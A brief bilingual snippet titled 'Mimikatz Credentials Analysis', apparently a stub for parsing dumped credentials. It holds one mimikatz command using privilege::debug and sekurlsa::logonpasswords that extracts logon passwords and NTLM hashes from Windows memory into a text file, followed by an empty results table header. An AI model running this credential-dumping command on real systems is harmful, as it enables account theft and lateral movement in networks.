Mimikatz 凭据解析

Mimikatz Credentials Analysis

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt





Credentials
# Username Domain NTLM Password Logon Time